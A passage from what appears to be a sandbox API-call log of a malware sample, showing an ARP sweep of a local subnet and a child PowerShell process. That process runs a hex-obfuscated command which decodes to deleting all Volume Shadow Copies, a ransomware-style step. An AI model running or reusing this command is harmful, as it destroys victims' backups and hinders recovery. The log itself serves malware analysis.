SendARP (DestIP=0x5f00a8c0, SrcIP=0x0, pMacAddr=0xb3ffdca, PhyAddrLen=0xb3ffdd0) Thread: id = 2302 os_tid = 0xd8 [0169.764] SendARP (DestIP=0x6000a8c0, SrcIP=0x0, pMacAddr=0xb5cfe42, PhyAddrLen=0xb5cfe48) Thread: id = 2303 os_tid = 0xb9c [0169.764] SendARP (DestIP=0x6100a8c0, SrcIP=0x0, pMacAddr=0xb7bf932, PhyAddrLen=0xb7bf938) Thread: id = 2304 os_tid = 0xdc [0169.765] SendARP (DestIP=0x6200a8c0, SrcIP=0x0, pMacAddr=0xb90fa6a, PhyAddrLen=0xb90fa70) Thread: id = 2305 os_tid = 0xe0 [0169.766] SendARP (DestIP=0x6300a8c0, SrcIP=0x0, pMacAddr=0xb08f7ea, PhyAddrLen=0xb08f7f0) Thread: id = 2306 os_tid = 0xe4 [0169.766] SendARP (DestIP=0x6400a8c0, SrcIP=0x0, pMacAddr=0xb2ef7c2, PhyAddrLen=0xb2ef7c8) Thread: id = 2307 os_tid = 0xe8 [0169.766] SendARP (DestIP=0x6500a8c0, SrcIP=0x0, pMacAddr=0xba8fe4a, PhyAddrLen=0xba8fe50) Thread: id = 2308 os_tid = 0xec [0169.767] SendARP (DestIP=0x6600a8c0, SrcIP=0x0, pMacAddr=0xbb8fe42, PhyAddrLen=0xbb8fe48) Thread: id = 2309 os_tid = 0x9d8 [0169.767] SendARP (DestIP=0x6700a8c0, SrcIP=0x0, pMacAddr=0xbe6fcb2, PhyAddrLen=0xbe6fcb8) Thread: id = 2310 os_tid = 0x898 [0169.768] SendARP (DestIP=0x6800a8c0, SrcIP=0x0, pMacAddr=0xbccfa82, PhyAddrLen=0xbccfa88) Thread: id = 2311 os_tid = 0x48c [0169.768] SendARP (DestIP=0x6900a8c0, SrcIP=0x0, pMacAddr=0xc0ef9ba, PhyAddrLen=0xc0ef9c0) Thread: id = 2312 os_tid = 0x6a4 [0169.768] SendARP (DestIP=0x6a00a8c0, SrcIP=0x0, pMacAddr=0xbf8f852, PhyAddrLen=0xbf8f858) Thread: id = 2313 os_tid = 0x20c [0169.769] SendARP (DestIP=0x6b00a8c0, SrcIP=0x0, pMacAddr=0xc36fb32, PhyAddrLen=0xc36fb38) Thread: id = 2314 os_tid = 0x630 [0169.769] SendARP (DestIP=0x6c00a8c0, SrcIP=0x0, pMacAddr=0xc47f78a, PhyAddrLen=0xc47f790) Thread: id = 2315 os_tid = 0x5e4 [0169.769] SendARP (DestIP=0x6d00a8c0, SrcIP=0x0, pMacAddr=0xc20fcf2, PhyAddrLen=0xc20fcf8) Thread: id = 2316 os_tid = 0xb28 [0169.771] SendARP (DestIP=0x6e00a8c0, SrcIP=0x0, pMacAddr=0xc61fa52, PhyAddrLen=0xc61fa58) Thread: id = 2317 os_tid = 0xb20 [0169.772] SendARP (DestIP=0x6f00a8c0, SrcIP=0x0, pMacAddr=0xc7bfde2, PhyAddrLen=0xc7bfde8) Thread: id = 2318 os_tid = 0x704 [0169.772] SendARP (DestIP=0x7000a8c0, SrcIP=0x0, pMacAddr=0xc93f9f2, PhyAddrLen=0xc93f9f8) Thread: id = 2319 os_tid = 0x568 [0169.788] SendARP (DestIP=0x7100a8c0, SrcIP=0x0, pMacAddr=0xcaff84a, PhyAddrLen=0xcaff850) Thread: id = 2320 os_tid = 0x5ac [0169.788] SendARP (DestIP=0x7200a8c0, SrcIP=0x0, pMacAddr=0xcd7fbb2, PhyAddrLen=0xcd7fbb8) Thread: id = 2321 os_tid = 0xb10 [0169.789] SendARP (DestIP=0x7300a8c0, SrcIP=0x0, pMacAddr=0xcbff88a, PhyAddrLen=0xcbff890) Thread: id = 2322 os_tid = 0xb44 [0169.790] SendARP (DestIP=0x7400a8c0, SrcIP=0x0, pMacAddr=0xd01f7d2, PhyAddrLen=0xd01f7d8) Thread: id = 2323 os_tid = 0xbcc [0169.790] SendARP (DestIP=0x7500a8c0, SrcIP=0x0, pMacAddr=0xd16f7a2, PhyAddrLen=0xd16f7a8) Thread: id = 2324 os_tid = 0xbc0 [0169.791] SendARP (DestIP=0x7600a8c0, SrcIP=0x0, pMacAddr=0xd29f932, PhyAddrLen=0xd29f938) Thread: id = 2325 os_tid = 0xbf0 [0169.792] SendARP (DestIP=0x7700a8c0, SrcIP=0x0, pMacAddr=0xcebfd1a, PhyAddrLen=0xcebfd20) Thread: id = 2326 os_tid = 0xbd0 [0169.793] SendARP (DestIP=0x7800a8c0, SrcIP=0x0, pMacAddr=0xd4bfdb2, PhyAddrLen=0xd4bfdb8) Thread: id = 2327 os_tid = 0xb0 [0169.794] SendARP (DestIP=0x7900a8c0, SrcIP=0x0, pMacAddr=0xd39fdf2, PhyAddrLen=0xd39fdf8) Thread: id = 2328 os_tid = 0xbe0 [0169.795] SendARP (DestIP=0x7a00a8c0, SrcIP=0x0, pMacAddr=0xd6bf992, PhyAddrLen=0xd6bf998) Thread: id = 2329 os_tid = 0xc04 [0169.797] SendARP (DestIP=0x7b00a8c0, SrcIP=0x0, pMacAddr=0xd80fa5a, PhyAddrLen=0xd80fa60) Thread: id = 2330 os_tid = 0xc08 [0169.797] SendARP (DestIP=0x7c00a8c0, SrcIP=0x0, pMacAddr=0xda9f82a, PhyAddrLen=0xda9f830) Thread: id = 2331 os_tid = 0xc0c [0169.798] SendARP (DestIP=0x7d00a8c0, SrcIP=0x0, pMacAddr=0xdc2fbda, PhyAddrLen=0xdc2fbe0) Thread: id = 2332 os_tid = 0xc10 [0169.799] SendARP (DestIP=0x7e00a8c0, SrcIP=0x0, pMacAddr=0xdd5fb1a, PhyAddrLen=0xdd5fb20) Thread: id = 2333 os_tid = 0xc14 [0169.800] SendARP (DestIP=0x7f00a8c0, SrcIP=0x0, pMacAddr=0xdf8ff6a, PhyAddrLen=0xdf8ff70) Thread: id = 2334 os_tid = 0xc18 [0169.801] SendARP (DestIP=0x8000a8c0, SrcIP=0x0, pMacAddr=0xd93fd42, PhyAddrLen=0xd93fd48) Thread: id = 2335 os_tid = 0x888 Thread: id = 2336 os_tid = 0x76c Thread: id = 2337 os_tid = 0xa9c Thread: id = 2338 os_tid = 0x114 Thread: id = 2339 os_tid = 0x5b8 Thread: id = 2340 os_tid = 0x814 Thread: id = 2341 os_tid = 0x834 Thread: id = 2342 os_tid = 0x884 Thread: id = 2343 os_tid = 0x5d4 Thread: id = 2344 os_tid = 0x340 Thread: id = 2345 os_tid = 0x810 Thread: id = 2346 os_tid = 0x830 Thread: id = 2347 os_tid = 0x880 Thread: id = 2348 os_tid = 0xae4 Thread: id = 2349 os_tid = 0x570 Thread: id = 2350 os_tid = 0xb40 Thread: id = 2351 os_tid = 0x5f4 Thread: id = 2352 os_tid = 0xbb8 Thread: id = 2353 os_tid = 0x598 Thread: id = 2354 os_tid = 0x4e4 Thread: id = 2355 os_tid = 0xbfc Thread: id = 2356 os_tid = 0x80c Thread: id = 2357 os_tid = 0xbf8 Thread: id = 2358 os_tid = 0x524 Thread: id = 2359 os_tid = 0x674 Thread: id = 2360 os_tid = 0x4a0 Thread: id = 2361 os_tid = 0x5d8 Thread: id = 2362 os_tid = 0x69c Thread: id = 2363 os_tid = 0xb74 Thread: id = 2364 os_tid = 0x4fc Thread: id = 2365 os_tid = 0xb08 Thread: id = 2366 os_tid = 0xb1c Thread: id = 2367 os_tid = 0x878 Thread: id = 2368 os_tid = 0xb24 Thread: id = 2369 os_tid = 0xa60 Thread: id = 2370 os_tid = 0x7d8 Thread: id = 2371 os_tid = 0x440 Thread: id = 2372 os_tid = 0x690 Thread: id = 2373 os_tid = 0x614 Thread: id = 2374 os_tid = 0x5b4 Thread: id = 2375 os_tid = 0x53c Thread: id = 2376 os_tid = 0x180 Thread: id = 2377 os_tid = 0xb04 Thread: id = 2378 os_tid = 0x220 Thread: id = 2379 os_tid = 0x4e8 Thread: id = 2380 os_tid = 0x24c Thread: id = 2381 os_tid = 0x2c4 Thread: id = 2382 os_tid = 0x224 Thread: id = 2383 os_tid = 0xa68 Thread: id = 2384 os_tid = 0xb18 Thread: id = 2385 os_tid = 0x7fc Thread: id = 2386 os_tid = 0xb00 Thread: id = 2387 os_tid = 0x760 Thread: id = 2388 os_tid = 0x3b4 Thread: id = 2389 os_tid = 0x320 Thread: id = 2390 os_tid = 0x240 Thread: id = 2391 os_tid = 0x75c Thread: id = 2392 os_tid = 0xa50 Thread: id = 2393 os_tid = 0x388 Thread: id = 2394 os_tid = 0x68c Thread: id = 2395 os_tid = 0xa8c Thread: id = 2396 os_tid = 0x2ac Thread: id = 2397 os_tid = 0xa1c Thread: id = 2398 os_tid = 0xb4c Thread: id = 2399 os_tid = 0x484 Thread: id = 2400 os_tid = 0x3d4 Thread: id = 2401 os_tid = 0x758 Thread: id = 2402 os_tid = 0xb68 Thread: id = 2403 os_tid = 0x6a8 Thread: id = 2404 os_tid = 0x4dc Thread: id = 2405 os_tid = 0x43c Thread: id = 2406 os_tid = 0x1c4 Thread: id = 2407 os_tid = 0xbec Thread: id = 2408 os_tid = 0xb48 Thread: id = 2409 os_tid = 0x5bc Thread: id = 2410 os_tid = 0x6b8 Thread: id = 2411 os_tid = 0x2dc Thread: id = 2412 os_tid = 0x158 Thread: id = 2413 os_tid = 0x6cc Thread: id = 2414 os_tid = 0x694 Thread: id = 2415 os_tid = 0x6d8 Thread: id = 2416 os_tid = 0x87c Thread: id = 2417 os_tid = 0xb88 Thread: id = 2418 os_tid = 0xb8c Thread: id = 2419 os_tid = 0x700 Thread: id = 2420 os_tid = 0x6f0 Thread: id = 2421 os_tid = 0x130 Thread: id = 2422 os_tid = 0x754 Thread: id = 2423 os_tid = 0x72c Thread: id = 2424 os_tid = 0x748 Thread: id = 2425 os_tid = 0x928 Thread: id = 2426 os_tid = 0xcc Thread: id = 2427 os_tid = 0xd0 Thread: id = 2428 os_tid = 0xd4 Thread: id = 2429 os_tid = 0xd8 Thread: id = 2430 os_tid = 0xb9c Thread: id = 2431 os_tid = 0xdc Thread: id = 2432 os_tid = 0xe0 Thread: id = 2433 os_tid = 0xe4 Thread: id = 2434 os_tid = 0xe8 Thread: id = 2435 os_tid = 0xec Thread: id = 2436 os_tid = 0x9d8 Thread: id = 2437 os_tid = 0x898 Thread: id = 2438 os_tid = 0x48c Thread: id = 2439 os_tid = 0x6a4 Thread: id = 2440 os_tid = 0x20c Thread: id = 2441 os_tid = 0xc0c Thread: id = 2442 os_tid = 0xc08 Thread: id = 2443 os_tid = 0xc04 Thread: id = 2444 os_tid = 0xbe0 Thread: id = 2445 os_tid = 0xb0 Thread: id = 2446 os_tid = 0xbd0 Thread: id = 2447 os_tid = 0xbf0 Thread: id = 2448 os_tid = 0xbc0 Thread: id = 2449 os_tid = 0xbcc Thread: id = 2450 os_tid = 0xb44 Thread: id = 2451 os_tid = 0xb10 Thread: id = 2452 os_tid = 0x5ac Thread: id = 2453 os_tid = 0x568 Thread: id = 2454 os_tid = 0x704 Thread: id = 2455 os_tid = 0xb20 Thread: id = 2456 os_tid = 0xb28 Thread: id = 2457 os_tid = 0x5e4 Thread: id = 2458 os_tid = 0x630 Thread: id = 2459 os_tid = 0xc18 Thread: id = 2460 os_tid = 0xc14 Thread: id = 2461 os_tid = 0xc10 Thread: id = 2462 os_tid = 0x888 Thread: id = 2463 os_tid = 0x76c Thread: id = 2464 os_tid = 0xa9c Thread: id = 2465 os_tid = 0x114 Thread: id = 2466 os_tid = 0x5b8 Thread: id = 2467 os_tid = 0x814 Thread: id = 2468 os_tid = 0x834 Thread: id = 2469 os_tid = 0x884 Thread: id = 2470 os_tid = 0x5d4 Thread: id = 2471 os_tid = 0x340 Thread: id = 2472 os_tid = 0x810 Thread: id = 2473 os_tid = 0x830 Thread: id = 2474 os_tid = 0x880 Thread: id = 2475 os_tid = 0xae4 Thread: id = 2476 os_tid = 0x570 Thread: id = 2477 os_tid = 0xb40 Thread: id = 2478 os_tid = 0x5f4 Thread: id = 2479 os_tid = 0xbb8 Thread: id = 2480 os_tid = 0x598 Thread: id = 2481 os_tid = 0x4e4 Thread: id = 2482 os_tid = 0xbfc Thread: id = 2483 os_tid = 0x80c Thread: id = 2484 os_tid = 0xbf8 Thread: id = 2485 os_tid = 0x524 Thread: id = 2486 os_tid = 0x674 Thread: id = 2487 os_tid = 0x4a0 Thread: id = 2488 os_tid = 0x5d8 Thread: id = 2489 os_tid = 0x69c Thread: id = 2490 os_tid = 0xb74 Thread: id = 2491 os_tid = 0x4fc Thread: id = 2492 os_tid = 0xb08 Thread: id = 2493 os_tid = 0xb1c Thread: id = 2494 os_tid = 0x878 Thread: id = 2495 os_tid = 0xb24 Thread: id = 2496 os_tid = 0xa60 Thread: id = 2497 os_tid = 0x7d8 Thread: id = 2498 os_tid = 0x440 Thread: id = 2499 os_tid = 0x690 Thread: id = 2500 os_tid = 0x614 Thread: id = 2501 os_tid = 0x5b4 Thread: id = 2502 os_tid = 0x53c Thread: id = 2503 os_tid = 0x180 Thread: id = 2504 os_tid = 0xb04 Thread: id = 2505 os_tid = 0x220 Thread: id = 2506 os_tid = 0x4e8 Thread: id = 2507 os_tid = 0x24c Thread: id = 2508 os_tid = 0x2c4 Thread: id = 2509 os_tid = 0x224 Thread: id = 2510 os_tid = 0xa68 Thread: id = 2511 os_tid = 0xb18 Thread: id = 2512 os_tid = 0x7fc Thread: id = 2513 os_tid = 0xb00 Thread: id = 2514 os_tid = 0x760 Thread: id = 2515 os_tid = 0x3b4 Thread: id = 2516 os_tid = 0x320 Thread: id = 2517 os_tid = 0x240 Thread: id = 2518 os_tid = 0x75c Thread: id = 2519 os_tid = 0xa50 Thread: id = 2520 os_tid = 0x388 Thread: id = 2521 os_tid = 0x68c Thread: id = 2522 os_tid = 0xa8c Thread: id = 2523 os_tid = 0x2ac Thread: id = 2524 os_tid = 0xa1c Thread: id = 2525 os_tid = 0xb4c Thread: id = 2526 os_tid = 0x484 Thread: id = 2527 os_tid = 0x3d4 Thread: id = 2528 os_tid = 0x758 Thread: id = 2529 os_tid = 0xb68 Thread: id = 2530 os_tid = 0x6a8 Thread: id = 2531 os_tid = 0x4dc Thread: id = 2532 os_tid = 0x43c Thread: id = 2533 os_tid = 0x1c4 Thread: id = 2534 os_tid = 0xbec Thread: id = 2535 os_tid = 0xb48 Thread: id = 2536 os_tid = 0x5bc Thread: id = 2537 os_tid = 0x6b8 Thread: id = 2538 os_tid = 0x2dc Thread: id = 2539 os_tid = 0x158 Thread: id = 2540 os_tid = 0x6cc Thread: id = 2541 os_tid = 0x694 Thread: id = 2542 os_tid = 0x6d8 Thread: id = 2543 os_tid = 0x87c Thread: id = 2544 os_tid = 0xb88 Thread: id = 2545 os_tid = 0xb8c Thread: id = 2546 os_tid = 0x700 Thread: id = 2547 os_tid = 0x6f0 Thread: id = 2548 os_tid = 0x130 Thread: id = 2549 os_tid = 0x754 Thread: id = 2550 os_tid = 0x72c Thread: id = 2551 os_tid = 0x748 Thread: id = 2552 os_tid = 0x928 Thread: id = 2553 os_tid = 0xcc Thread: id = 2554 os_tid = 0xd0 Thread: id = 2555 os_tid = 0xd4 Thread: id = 2556 os_tid = 0xd8 Thread: id = 2557 os_tid = 0xb9c Thread: id = 2558 os_tid = 0xdc Thread: id = 2559 os_tid = 0xe0 Thread: id = 2560 os_tid = 0xe4 Thread: id = 2561 os_tid = 0xe8 Thread: id = 2562 os_tid = 0xec Thread: id = 2563 os_tid = 0x9d8 Thread: id = 2564 os_tid = 0x898 Thread: id = 2565 os_tid = 0x48c Thread: id = 2566 os_tid = 0x6a4 Thread: id = 2567 os_tid = 0x20c Thread: id = 2568 os_tid = 0xc0c Thread: id = 2569 os_tid = 0xc08 Thread: id = 2570 os_tid = 0xc04 Thread: id = 2571 os_tid = 0xbe0 Thread: id = 2572 os_tid = 0xb0 Thread: id = 2573 os_tid = 0xbd0 Thread: id = 2574 os_tid = 0xbf0 Thread: id = 2575 os_tid = 0xbc0 Thread: id = 2576 os_tid = 0xbcc Thread: id = 2577 os_tid = 0xb44 Thread: id = 2578 os_tid = 0xb10 Thread: id = 2579 os_tid = 0x5ac Thread: id = 2580 os_tid = 0x568 Thread: id = 2581 os_tid = 0x704 Thread: id = 2582 os_tid = 0xb20 Thread: id = 2583 os_tid = 0xb28 Thread: id = 2584 os_tid = 0x5e4 Thread: id = 2585 os_tid = 0x630 Thread: id = 2586 os_tid = 0xc18 Thread: id = 2587 os_tid = 0xc14 Thread: id = 2588 os_tid = 0xc10 Thread: id = 2593 os_tid = 0xc10 Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x4c424000" os_pid = "0x340" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb58" cmd_line = "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x76c [0073.667] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0074.041] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0074.041] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0074.041] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0074.042] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0074.598] GetVersionExW (in: lpVersionInformation=0xcd880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.600] GetVersionExW (in: lpVersionInformation=0xcd880*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd880*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.614] GetVersionExW (in: lpVersionInformation=0xcd5f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd5f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.615] SetErrorMode (uMode=0x1) returned 0x1 [0074.616] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd750 | out: lpFileInformation=0xcd750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0074.617] SetErrorMode (uMode=0x1) returned 0x1 [0074.620] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcd9c0 | out: lpdwHandle=0xcd9c0) returned 0x94c [0074.622] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d07160 | out: lpData=0x2d07160) returned 1 [0074.625] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd938, puLen=0xcd930 | out: lplpBuffer=0xcd938*=0x2d071fc, puLen=0xcd930) returned 1 [0074.628] lstrlenW (lpString="䅁") returned 1 [0074.639] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d072d8, puLen=0xcd8a0) returned 1 [0074.640] lstrlenW (lpString="Microsoft Corporation") returned 21 [0074.643] CoTaskMemAlloc (cb=0x2e) returned 0x1ec190 [0074.643] lstrcpyW (in: lpString1=0x1ec190, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0074.645] CoTaskMemFree (pv=0x1ec190) [0074.645] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d0732c, puLen=0xcd8a0) returned 1 [0074.645] lstrlenW (lpString="System.Management.Automation") returned 28 [0074.645] CoTaskMemAlloc (cb=0x3c) returned 0x1f69e0 [0074.645] lstrcpyW (in: lpString1=0x1f69e0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0074.645] CoTaskMemFree (pv=0x1f69e0) [0074.645] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d07388, puLen=0xcd8a0) returned 1 [0074.645] lstrlenW (lpString="6.1.7601.17514") returned 14 [0074.645] CoTaskMemAlloc (cb=0x20) returned 0x1ed550 [0074.645] lstrcpyW (in: lpString1=0x1ed550, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0074.645] CoTaskMemFree (pv=0x1ed550) [0074.646] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d073c8, puLen=0xcd8a0) returned 1 [0074.646] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0074.646] CoTaskMemAlloc (cb=0x44) returned 0x1f69e0 [0074.646] lstrcpyW (in: lpString1=0x1f69e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0074.646] CoTaskMemFree (pv=0x1f69e0) [0074.646] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d07430, puLen=0xcd8a0) returned 1 [0074.646] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0074.646] CoTaskMemAlloc (cb=0x76) returned 0x194b80 [0074.646] lstrcpyW (in: lpString1=0x194b80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0074.646] CoTaskMemFree (pv=0x194b80) [0074.646] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d074cc, puLen=0xcd8a0) returned 1 [0074.646] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0074.646] CoTaskMemAlloc (cb=0x44) returned 0x1f69e0 [0074.646] lstrcpyW (in: lpString1=0x1f69e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0074.646] CoTaskMemFree (pv=0x1f69e0) [0074.646] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d07530, puLen=0xcd8a0) returned 1 [0074.646] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0074.646] CoTaskMemAlloc (cb=0x58) returned 0x15af00 [0074.646] lstrcpyW (in: lpString1=0x15af00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0074.646] CoTaskMemFree (pv=0x15af00) [0074.646] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d075ac, puLen=0xcd8a0) returned 1 [0074.647] lstrlenW (lpString="6.1.7601.17514") returned 14 [0074.647] CoTaskMemAlloc (cb=0x20) returned 0x1ed550 [0074.647] lstrcpyW (in: lpString1=0x1ed550, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0074.647] CoTaskMemFree (pv=0x1ed550) [0074.647] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x2d07254, puLen=0xcd8a0) returned 1 [0074.647] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0074.647] CoTaskMemAlloc (cb=0x66) returned 0x16ef50 [0074.647] lstrcpyW (in: lpString1=0x16ef50, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0074.647] CoTaskMemFree (pv=0x16ef50) [0074.647] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x0, puLen=0xcd8a0) returned 0 [0074.647] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x0, puLen=0xcd8a0) returned 0 [0074.647] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd8a8, puLen=0xcd8a0 | out: lplpBuffer=0xcd8a8*=0x0, puLen=0xcd8a0) returned 0 [0074.647] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2d071fc, puLen=0xcd870) returned 1 [0074.648] CoTaskMemAlloc (cb=0x204) returned 0x1a3c20 [0074.649] VerLanguageNameW (in: wLang=0x0, szLang=0x1a3c20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0074.650] CoTaskMemFree (pv=0x1a3c20) [0074.650] VerQueryValueW (in: pBlock=0x2d07160, lpSubBlock="\\", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2d07188, puLen=0xcd8c0) returned 1 [0074.657] GetCurrentProcessId () returned 0x340 [0074.684] LookupPrivilegeValueW 